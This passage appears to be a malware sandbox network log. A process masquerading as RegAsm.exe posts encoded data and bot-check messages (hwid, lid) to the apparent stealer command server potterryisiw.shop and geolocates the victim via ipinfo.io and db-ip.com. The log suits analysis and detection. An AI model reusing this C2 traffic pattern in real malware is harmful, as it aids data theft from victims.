2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: 40 41 26 76 2d 65 5a 53 f6 f0 b9 8a 44 5a 5a ac a4 4f 87 8e 38 db 49 5c 81 9f ba 50 47 d7 92 9a 53 69 ee 5a 48 a4 1c ee d3 3d d4 50 28 36 40 c4 27 45 17 9b ea cf 1f 9e 1a 14 59 99 f8 fb e7 85 f3 88 8d 4f dd 38 4d 4e 61 bf 77 5b f1 4a 6f 75 5d 87 cd e2 f5 e3 e9 97 61 33 cf e8 23 03 89 22 cd 06 fd a7 18 1c be e7 ea 57 8e 06 3f b8 e5 e1 75 2a a9 ee 14 97 36 34 ef 43 8b 43 d2 d6 ca 7e 49 67 9e 50 5e 0b ad 6d 66 47 cc 3f 4a 7b 64 f2 2d 30 7a 9f 36 f6 f2 f6 fe a1 5d 0d cb ba c5 02 ba 06 09 d1 10 1e 48 5d 1a df 9a ac ae b3 78 19 ac c2 54 ca 9d cc 72 e6 25 53 42 d0 a1 e8 40 fe e0 06 97 df 89 f2 ba ab 9e 28 aa fc 9a 38 52 93 b9 5f b6 fc 3b b2 3f e2 dc 91 10 47 ff 9d aa ad a8 8c 97 0d aa a2 a4 a5 e9 f1 81 b3 19 11 4f fa 2f 8a 3e 68 60 86 79 6f 47 ad b5 16 54 ce 44 Data Ascii: @A&v-eZSDZZO8I\PGSiZH=P(6@'EYO8MNaw[Jou]a3#"W?u*64CC~IgP^mfG?J{d-0z6]H]xTr%SB@(8R_;?GO/>h`yoGTD
2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: c8 fc d3 9a 77 0e 78 cf 5c fb 39 c9 45 bb 2d 17 43 56 b3 6b e8 f3 ea 44 a4 90 ed 2d 92 f2 5e a4 90 34 0f ee ed 3b 5d 0f 75 5d 18 cc cc 98 7a 2f dd 50 d9 0e 96 65 a3 e6 ba 32 a1 a2 26 39 76 bb 2f 27 ef 54 14 68 09 d3 16 d0 14 5b e1 89 b7 de af ed fa 8d 67 58 1b 15 6b ba f3 30 c9 2f c5 1a 19 df e5 df 95 3e bf f3 e2 8e 17 32 52 9e c0 f5 f2 63 9e 4b e2 4c 5d 47 dc 5e fa 4b b3 9d fa 63 d7 ef 37 9d bb 7e a9 64 4f b5 50 dc 3a a8 4a d0 30 ca 89 bb a2 43 d3 e5 d4 c9 39 91 c0 26 84 b1 24 03 f9 09 2c da 58 81 ca 09 91 4d c3 d4 3f 57 c6 bc c6 89 bc 3f a2 d1 45 ad 4a 42 ef db 9d d3 79 e7 c5 22 7e 14 da f2 ea c1 04 df bf e8 e4 8b 04 50 6d 13 db 69 6f f4 d4 05 6f 46 29 45 48 89 f6 be 3a c6 a5 0d 20 d4 a6 aa d1 71 99 63 f1 a1 12 93 e9 cf d1 65 9e 1e cb dd 74 53 6f c7 8f Data Ascii: wx\9E-CVkD-^4;]u]z/Pe2&9v/'Th[gXk0/>2RcKL]G^Kc7~dOP:J0C9&$,XM?W?EJBy"~PmiooF)EH: qcetSo
2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: b2 0f b0 b1 09 70 3d 73 eb 03 97 77 3f a9 6c fd aa fc cf d5 96 f2 10 fb 39 7f f5 d4 37 06 d0 db ca ec 45 8c 6f 05 aa 26 06 1d 39 d7 0b 4e 6d 95 5a 66 bd 56 b3 9d 59 ea ed 6a ce 04 2e 5e ae c0 49 55 1b 28 1d 26 d8 90 e4 46 0d 4b 6f ee 3f c8 d0 df a8 cd d0 db d8 cc 38 08 c3 4e 3b 4e d7 66 ac 69 8f 94 bb 4e b7 f2 93 94 e0 bf 44 a0 e8 56 50 de 53 b5 4d 42 0f 22 c2 b5 b2 c3 a5 f2 ff 88 c4 c0 b0 26 61 95 d1 db 6d b9 d0 8a b8 bd 04 c1 42 21 47 7d 20 dd 30 47 77 f1 28 0f 72 07 51 11 0d 8b 40 7f e8 0b cb aa 7b 02 14 b6 87 2f 87 cf 56 bb 77 52 05 93 28 fe 42 aa dc 7e 76 bb 3c c3 56 4a ab 1a 34 4a 10 7f 08 3f 19 1d cc 1f 0a e7 f1 41 c1 72 72 56 b8 7a 43 64 0f b3 d4 76 b5 2c fe d4 00 dd c6 9a 61 bd f2 3b 0c 5c 62 34 14 f6 35 35 5f 9e 25 8a c3 15 8a d6 fb cc 85 aa 84 Data Ascii: p=sw?l97Eo&9NmZfVYj.^IU(&FKo?8N;NfiNDVPSMB"&amB!G} 0Gw(rQ@{/VwR(B~v<VJ4J?ArrVzCdv,a;\b455_%
2024-07-01 07:16:30 UTC	15331	OUT	Data Raw: 2a f3 87 61 6c fd 59 a5 45 fb a9 1c 5a d5 6f 68 ba b9 50 c5 54 3d c5 ad 37 52 e9 d1 91 6b 8f a5 d8 df aa c7 bf 85 99 bc fd 1a a9 14 73 e4 f1 f2 e5 64 b7 3c 8b db 16 c4 74 dc 21 3f 9e 08 2c 7b 69 c0 2b fe 6c 1b 33 94 e0 fd 41 76 87 b8 4b a6 92 c8 2f 32 1c 46 31 87 5e 26 09 b7 1f 3d 9e 28 3d 18 60 96 2c c9 2f e2 ef 54 e0 20 1c 08 3f aa 20 9a 77 fe 10 af 65 2f 59 ed 80 5e 6f 9f 8f 97 6f 29 be 10 e6 40 97 2e a9 58 ce 7e bf 94 d7 f2 38 7e 1a 7b 3a fa 8b 2a 87 83 5c 7f ca c5 27 15 fc f7 4d 7f f5 7f ba 02 39 11 3b 7c 55 25 be a5 2a 16 1d 6a e6 64 a3 52 48 9c 48 b8 37 78 e8 e9 b4 24 3a 54 01 76 9c 07 ac 33 0a ac 6e ca d8 d3 e1 3b 99 07 7e cc f6 86 08 b3 8b f7 49 5d 95 b4 5c 9a ab 5f d8 59 a3 0e a8 a0 07 85 0a 99 41 3b 33 26 fa 17 c3 3f 94 c2 51 31 fc 58 18 31 c8 Data Ascii: alYEZohPT=7Rksd<t!?,{i+l3AvK/2F1^&=(=`,/T ? we/Y^oo)@.X~8~{:\'M9;\|U%*jdRHH7x$:Tv3n;~I]\_YA;3&?Q1X1
2024-07-01 07:16:32 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bh37hev1q5skkf9dh6a1fobfnt; expires=Fri, 25-Oct-2024 01:03:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5p0jtZ1j1LafyLLh%2B8%2FkTfN0wuc0LeGh38lvQebVlgnq1hkWH2naeE7YFnHPp1mHvc6nN2bHmiD5qbH0glwaYwdCTbGXCXzX0p6HFNKX35d%2FyYW6bYZ6juAw%2BJ%2BjJKMwtkhzyQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c6c3df743a1-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49789	188.114.97.3	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:32 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: potterryisiw.shop
2024-07-01 07:16:32 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d 26 68 77 69 64 3d 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--default2806&j=&hwid=C4420F3912B23C705E0F544319C54822
2024-07-01 07:16:33 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7iqd35i2p47if956eklhusiq5p; expires=Fri, 25-Oct-2024 01:03:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DwrfvlIUUPTHmrksPbMqsz28Psm7hK5K75CzPZx%2BpYL%2FkqfGEFBkXRis7C%2BEYIfyJcCA%2FzTDASYaS2GG0Lbyn8dd9SlHZpxkpGyOnw2hGbkNb8WIZtcNk9K1TnvqF%2FQrrjrFkw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c77ca9e8ccc-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:33 UTC	54	IN	Data Raw: 33 30 0d 0a 41 2f 49 6a 2f 43 46 2f 32 33 37 76 6a 56 47 4e 73 43 5a 45 61 59 79 63 45 6f 69 4b 44 6a 37 59 64 36 66 68 61 42 51 6a 79 46 39 59 72 77 3d 3d 0d 0a Data Ascii: 30A/Ij/CF/237vjVGNsCZEaYycEoiKDj7Yd6fhaBQjyF9Yrw==
2024-07-01 07:16:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49788	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:32 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: potterryisiw.shop
2024-07-01 07:16:32 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-01 07:16:33 UTC	812	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8v2fouu57q4futlfuv6hfs6sos; expires=Fri, 25-Oct-2024 01:03:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dsgekSoC3QZZ1iZvTd3WYeZEmqkipY1%2BhHsg6le4HCIf52mkIr6in9MFL4R%2FAEHAOBm5opiVMUnvGn2hUt%2BoS8%2BqglQ2XPg3Ke%2BSMEDgGD%2FqtUe8%2BV4CZFKYrOxvTGYMINfYA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c780db47cee-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:33 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-01 07:16:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49791	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:32 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-07-01 07:16:33 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 01 Jul 2024 07:16:33 GMT content-type: application/json; charset=utf-8 Content-Length: 1025 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-01 07:16:33 UTC	876	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-07-01 07:16:33 UTC	149	IN	Data Raw: 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49792	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:33 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-07-01 07:16:33 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 01 Jul 2024 07:16:33 GMT content-type: application/json; charset=utf-8 Content-Length: 1025 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-01 07:16:33 UTC	876	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-07-01 07:16:33 UTC	149	IN	Data Raw: 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49793	104.26.4.15	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:33 UTC	260	OUT	GET /demo/home.php?s=8.46.123.33 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-07-01 07:16:33 UTC	653	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:33 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: A29E3EA9:73E8_93878F2E:0050_668257D1_168CBCFF:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U7%2Bfi4wwejlLRozR4sleLtXDMBfMn6Qdzx%2B8YuhFwiMQUQ9FSZZJAazGTbFFTzlATu1bPMfmgfAc6yqaCzISZOHtQdp15GmqpZby7xnaSHyPoNqtSAHC7WJLqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c7ea8ba0f99-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:33 UTC	673	IN	Data Raw: 32 39 61 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 3a 5b Data Ascii: 29a{"status":"ok","demoInfo":{"ipAddress":"8.46.123.33","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages":[
2024-07-01 07:16:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49795	104.26.4.15	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:33 UTC	260	OUT	GET /demo/home.php?s=8.46.123.33 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-07-01 07:16:33 UTC	659	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:33 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: A29E3F18:6C82_93878F2E:0050_668257D1_168CBD00:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQJgqxeNip8N4do66jzDWBUUHSzZn4gS0HgBeg19IBPuYFGGy9TI8dXsjA%2BNvGIC%2B5Ugtn6Rjf%2FI21gEvLPeE799NUJoUwMAMXeqXS%2F80bHgifkB1wc%2B8CrFXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c7f0ee90c7a-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:33 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-07-01 07:16:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49797	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:34 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: potterryisiw.shop
2024-07-01 07:16:34 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--default2806&j=
2024-07-01 07:16:34 UTC	804	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9657vu376opr1j0l977sjkg936; expires=Fri, 25-Oct-2024 01:03:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VL%2BL6fTQKqXielKIb8oCQ1OC8sqnFRjbLdvHd2q7D6Vvf3dWqP08YL5IZ%2BVtioXhuZPXRITW5yz%2BQoyvEajSHMB9J8LQnPwyus83vFiznwjphzwIgdhCmn4T3BoLvCdtDYfpqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c81cd55c332-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:34 UTC	565	IN	Data Raw: 34 64 61 0d 0a 48 51 68 6f 54 59 64 56 39 39 6f 6d 68 5a 33 6d 66 74 55 6f 64 49 4d 54 47 4f 48 55 37 48 6c 68 79 2b 45 66 68 55 44 72 53 37 78 6d 41 6d 46 76 38 58 66 4e 2b 68 4b 70 6c 2b 39 63 70 6b 31 57 75 54 4e 73 6b 36 47 4a 56 57 76 43 77 33 37 68 59 74 46 72 32 6e 78 6b 47 79 69 72 58 2f 37 34 51 2f 32 2f 33 46 36 4f 49 6e 32 4b 61 44 6a 44 73 59 4a 62 57 2b 76 44 65 75 38 69 69 69 66 65 66 47 4d 48 50 65 73 32 6e 37 5a 42 37 66 69 46 47 72 52 45 47 65 5a 32 66 59 43 2b 67 68 41 4d 6f 34 77 39 71 57 44 4a 4c 73 59 2f 4d 6b 68 76 79 6a 43 44 75 32 76 6b 37 6f 31 63 39 56 56 59 69 52 6f 52 6d 76 54 4f 48 41 2f 70 32 7a 2b 6e 49 59 34 70 30 48 74 73 41 79 58 76 50 5a 4f 35 51 75 2f 74 6a 78 69 39 51 42 62 6e 65 6e 65 4c 70 49 41 66 43 36 57 43 63 4f Data Ascii: 4daHQhoTYdV99omhZ3mftUodIMTGOHU7Hlhy+EfhUDrS7xmAmFv8XfN+hKpl+9cpk1WuTNsk6GJVWvCw37hYtFr2nxkGyirX/74Q/2/3F6OIn2KaDjDsYJbW+vDeu8iiifefGMHPes2n7ZB7fiFGrREGeZ2fYC+ghAMo4w9qWDJLsY/MkhvyjCDu2vk7o1c9VVYiRoRmvTOHA/p2z+nIY4p0HtsAyXvPZO5Qu/tjxi9QBbneneLpIAfC6WCcO
2024-07-01 07:16:34 UTC	684	IN	Data Raw: 35 44 4f 55 76 45 72 70 2b 34 67 61 75 55 63 5a 35 33 74 36 68 4c 79 47 45 77 4b 6b 69 48 4c 6e 4a 34 51 74 32 48 4e 72 44 32 2b 72 64 64 57 2f 58 4b 65 6e 78 6c 79 5a 54 52 58 7a 4d 30 2b 41 75 49 41 63 46 65 6e 42 59 71 6c 4b 34 6b 4c 48 50 53 6f 4e 49 36 56 76 31 2f 68 4b 34 76 43 57 48 61 56 50 47 50 4e 39 66 34 57 37 6a 52 55 44 72 49 52 77 36 53 53 4f 4b 74 5a 37 61 77 51 6a 37 7a 53 52 75 77 53 70 76 63 51 62 72 77 70 4f 6f 7a 46 4c 67 4c 4b 4a 43 51 43 6e 77 7a 2f 34 62 4f 46 43 74 57 59 6f 53 69 6a 70 64 38 33 36 42 4f 33 35 69 52 57 38 54 52 37 74 59 33 47 4d 74 59 63 63 42 61 4f 41 64 65 30 6b 68 79 6a 5a 65 6d 30 59 49 65 34 36 6c 72 4a 43 70 37 48 47 58 4c 42 53 56 72 6b 7a 4f 71 32 31 6e 77 30 78 71 70 4a 73 70 32 43 57 5a 37 59 55 41 52 4e Data Ascii: 5DOUvErp+4gauUcZ53t6hLyGEwKkiHLnJ4Qt2HNrD2+rddW/XKenxlyZTRXzM0+AuIAcFenBYqlK4kLHPSoNI6Vv1/hK4vCWHaVPGPN9f4W7jRUDrIRw6SSOKtZ7awQj7zSRuwSpvcQbrwpOozFLgLKJCQCnwz/4bOFCtWYoSijpd836BO35iRW8TR7tY3GMtYccBaOAde0khyjZem0YIe46lrJCp7HGXLBSVrkzOq21nw0xqpJsp2CWZ7YUARN
2024-07-01 07:16:34 UTC	1369	IN	Data Raw: 34 63 30 36 0d 0a 6e 6c 4d 74 58 32 42 71 66 34 6e 46 7a 76 43 46 62 46 66 32 32 58 76 63 77 75 41 4b 65 4e 65 76 46 69 79 7a 61 51 46 77 46 68 4e 71 64 33 6b 72 51 45 76 37 33 45 45 72 70 42 47 75 5a 34 65 34 43 32 68 42 55 4d 6f 34 74 31 35 79 2b 49 49 74 5a 35 5a 77 45 67 36 6a 43 64 75 30 6a 69 38 6f 64 63 2b 51 68 57 35 6d 6b 36 32 2f 54 4f 50 67 32 71 6b 6d 79 6c 46 34 6f 6e 30 48 68 38 53 6d 33 36 65 66 33 54 4c 2f 36 39 78 42 75 37 43 6b 36 6a 4d 58 43 45 73 59 6f 57 43 61 71 48 65 65 6f 74 67 43 44 58 62 57 41 47 49 66 63 36 6e 37 31 4b 36 2f 71 4c 48 4c 5a 4c 47 4f 74 36 4f 73 33 30 7a 68 77 62 36 64 73 2f 70 77 32 45 4f 63 78 31 59 52 74 74 30 44 53 62 74 6b 50 78 76 38 59 44 2b 53 4a 39 69 6d 67 34 77 37 47 43 57 31 76 72 77 33 62 68 4c 6f 55 Data Ascii: 